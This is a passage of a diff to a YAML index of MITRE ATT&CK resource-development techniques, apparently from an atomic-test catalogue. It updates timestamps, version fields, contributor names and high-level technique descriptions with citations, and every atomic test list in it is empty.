-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.003:
     technique:
@@ -51851,7 +52529,7 @@ resource-development:
         url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
         description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
           Certificates. Retrieved October 16, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:32:34.604Z'
       name: Digital Certificates
       description: |-
         Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
@@ -51871,8 +52549,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1587.001:
     technique:
@@ -51911,7 +52587,7 @@ resource-development:
         description: 'FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define
           a Russian Cyber Threat Group. Retrieved September 17, 2015.'
         url: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-01-14T17:14:27.890Z'
       name: Malware
       description: |-
         Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)
@@ -51932,8 +52608,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Content'
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.001:
     technique:
@@ -51963,7 +52637,7 @@ resource-development:
         description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
           March 6, 2017.
         url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-16T17:15:12.169Z'
       name: Social Media Accounts
       description: "Adversaries may compromise social media accounts that can be used
         during targeting. For operations incorporating social engineering, the utilization
@@ -52000,8 +52674,6 @@ resource-development:
       x_mitre_data_sources:
       - 'Persona: Social Media'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1588.006:
     technique:
@@ -52023,7 +52695,7 @@ resource-development:
         url: https://nvd.nist.gov/
         description: National Vulnerability Database. (n.d.). National Vulnerability
           Database. Retrieved October 15, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:16:32.119Z'
       name: Vulnerabilities
       description: |-
         Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
@@ -52045,8 +52717,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.005:
     technique:
@@ -52083,7 +52753,7 @@ resource-development:
         description: Brian Krebs. (2016, October 27). Are the Days of “Booter” Services
           Numbered?. Retrieved May 15, 2017.
         url: https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T02:49:14.664Z'
       name: Botnet
       description: 'Adversaries may buy, lease, or rent a network of compromised systems that
         can be used during targeting. A botnet is a network of compromised systems
@@ -52105,8 +52775,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1608.004:
     technique:
@@ -52168,7 +52836,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1587.002:
     technique:
@@ -52190,7 +52857,7 @@ resource-development:
         description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
           31, 2016.
         source_name: Wikipedia Code Signing
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:07:08.549Z'
       name: Code Signing Certificates
       description: |-
         Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -52208,8 +52875,6 @@ resource-development:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1584.003:
     technique:
@@ -52244,7 +52909,7 @@ resource-development:
         url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
         description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
           Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:59:02.770Z'
       name: Virtual Private Server
       description: |-
         Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
@@ -52263,33 +52928,31 @@ resource-development:
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1586.003:
     technique:
-      modified: '2022-10-21T14:21:57.991Z'
+      modified: '2024-10-16T21:26:36.312Z'
       name: Cloud Accounts
       description: |-
-        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
+        Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
 
         A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_contributors:
+      - Francesco Bigarella
+      x_mitre_deprecated: false
       x_mitre_detection: 'Much of this activity will take place outside the visibility
         of the target organization, making detection of this behavior difficult. Detection
         efforts may be focused on related stages of the adversary lifecycle, such
         as during exfiltration (ex: [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).'
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Francesco Bigarella
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--3d52e51e-f6db-4719-813c-48002a99f43a
       created: '2022-05-27T14:30:01.904Z'
@@ -52299,10 +52962,19 @@ resource-development:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1586/003
         external_id: T1586.003
+      - source_name: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022
+        description: 'Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials:
+          Case Studies From the Wild. Retrieved March 9, 2023.'
+        url: https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
       - source_name: Awake Security C2 Cloud
         description: 'Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting
           Command & Control in the Cloud. Retrieved May 27, 2022.'
         url: https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/
+      - source_name: Netcraft SendGrid 2024
+        description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+          is abused to host phishing attacks impersonating itself. Retrieved October
+          15, 2024.
+        url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
       - source_name: MSTIC Nobelium Oct 2021
         description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
           targeting delegated administrative privileges to facilitate broader attacks.
@@ -52310,9 +52982,8 @@ resource-development:
         url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586.002:
     technique:
@@ -52363,11 +53034,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.001:
     technique:
-      modified: '2023-04-11T23:22:49.534Z'
+      modified: '2024-10-16T20:13:40.501Z'
       name: Upload Malware
       description: |-
         Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -52380,7 +53050,7 @@ resource-development:
         phase_name: resource-development
       x_mitre_contributors:
       - Kobi Haimovich, CardinalOps
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
@@ -52415,22 +53085,25 @@ resource-development:
         url: https://blog.talosintelligence.com/ipfs-abuse/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.001:
     technique:
-      modified: '2024-04-13T14:03:04.511Z'
+      modified: '2024-09-25T15:26:00.047Z'
       name: Domains
       description: |-
         Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
 
-        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+        Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+        Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
 
         Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
 
         Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+        In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
@@ -52451,7 +53124,7 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - PRE
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Domain Name: Passive DNS'
       - 'Domain Name: Domain Registration'
@@ -52490,6 +53163,10 @@ resource-development:
         description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
           OPERATIONS?. Retrieved August 19, 2015.'
         url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+      - source_name: Invictus IR DangerDev 2024
+        description: Invictus Incident Response. (2024, January 31). The curious case
+          of DangerDev@protonmail.me. Retrieved March 19, 2024.
+        url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
       - source_name: Domain_Steal_CC
         description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
           Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -52545,7 +53222,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.002:
     technique:
@@ -52603,7 +53279,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.004:
     technique:
@@ -52683,7 +53358,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.002:
     technique:
@@ -52743,7 +53417,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.001:
     technique:
@@ -52765,7 +53438,7 @@ resource-development:
         description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
           SunshopFireEye. Retrieved March 6, 2017.'
         url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:15:52.805Z'
       name: Malware
       description: |-
         Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
@@ -52784,42 +53457,10 @@ resource-development:
       x_mitre_data_sources:
       - 'Malware Repository: Malware Metadata'
       - 'Malware Repository: Malware Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1583.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
-      type: attack-pattern
-      created: '2020-10-01T00:44:23.935Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1583.003
-        url: https://attack.mitre.org/techniques/T1583/003
-      - source_name: TrendmicroHideoutsLease
-        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
-          Bulletproof Hosting Services. Retrieved March 6, 2017.'
-        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
-      - source_name: ThreatConnect Infrastructure Dec 2020
-        url: https://threatconnect.com/blog/infrastructure-research-hunting/
-        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
-          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      - source_name: Mandiant SCANdalous Jul 2020
-        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
-        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
-          Using Network Scan Data and Automation). Retrieved October 12, 2021.
-      - source_name: Koczwara Beacon Hunting Sep 2021
-        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
-        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
-          Shodan. Retrieved October 12, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T13:22:11.113Z'
       name: Virtual Private Server
       description: |-
         Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
@@ -52828,22 +53469,53 @@ resource-development:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
 
         Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
       - 'Internet Scan: Response Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+      created: '2020-10-01T00:44:23.935Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1583/003
+        external_id: T1583.003
+      - source_name: Koczwara Beacon Hunting Sep 2021
+        description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+          Shodan. Retrieved October 12, 2021.
+        url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+      - source_name: TrendmicroHideoutsLease
+        description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+          Bulletproof Hosting Services. Retrieved March 6, 2017.'
+        url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+      - source_name: Mandiant SCANdalous Jul 2020
+        description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+          Using Network Scan Data and Automation). Retrieved October 12, 2021.
+        url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+      - source_name: ThreatConnect Infrastructure Dec 2020
+        description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+          and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+        url: https://threatconnect.com/blog/infrastructure-research-hunting/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1584:
     technique:
-      modified: '2024-03-28T03:53:28.299Z'
+      modified: '2024-10-16T20:06:03.570Z'
       name: Compromise Infrastructure
       description: |-
         Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -52857,7 +53529,7 @@ resource-development:
       x_mitre_contributors:
       - Jeremy Galloway
       - Shailesh Tiwary (Indian Army)
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
         information and/or domain resolution information that may indicate the compromise
@@ -52944,11 +53616,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1586:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T01:08:56.774Z'
       name: Compromise Accounts
       description: "Adversaries may compromise accounts with services that can be
         used during targeting. For operations incorporating social engineering, the
@@ -53008,7 +53679,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1584.005:
     technique:
@@ -53050,7 +53720,7 @@ resource-development:
         servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
         adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
         or Distributed Denial of Service (DDoS).'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T15:55:58.319Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Botnet
       x_mitre_detection: Much of this activity will take place outside the visibility
@@ -53065,7 +53735,6 @@ resource-development:
       x_mitre_is_subtechnique: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608:
     technique:
@@ -53156,11 +53825,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1608.005:
     technique:
-      modified: '2024-04-13T14:03:24.673Z'
+      modified: '2024-10-16T20:09:41.391Z'
       name: Link Target
       description: "Adversaries may put in place resources that are referenced by
         a link that can be used during targeting. An adversary may rely upon a user
@@ -53193,15 +53861,16 @@ resource-development:
         to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
         Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
         In addition, adversaries may serve a variety of malicious links through uniquely
-        generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
-        Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
-        decentralized nature of the InterPlanetary File System (IPFS) to host link
-        targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+        generated URIs/URLs (including one-time, single use links).(Citation: iOS
+        URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+        adversaries may take advantage of the decentralized nature of the InterPlanetary
+        File System (IPFS) to host link targets that are difficult to remove.(Citation:
+        Talos IPFS 2022)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: resource-development
       x_mitre_contributors:
-      - Goldstein Menachem
+      - Menachem Goldstein
       - Hen Porcilan
       - Diyar Saadi Ali
       - Nikola Kovac
@@ -53285,7 +53954,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1583.006:
     technique:
@@ -53339,7 +54007,6 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1585.003:
     technique:
@@ -53390,36 +54057,10 @@ resource-development:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1588.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - SOCCRATES
-      - Mnemonic AS
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
-      type: attack-pattern
-      created: '2020-10-01T02:08:33.977Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
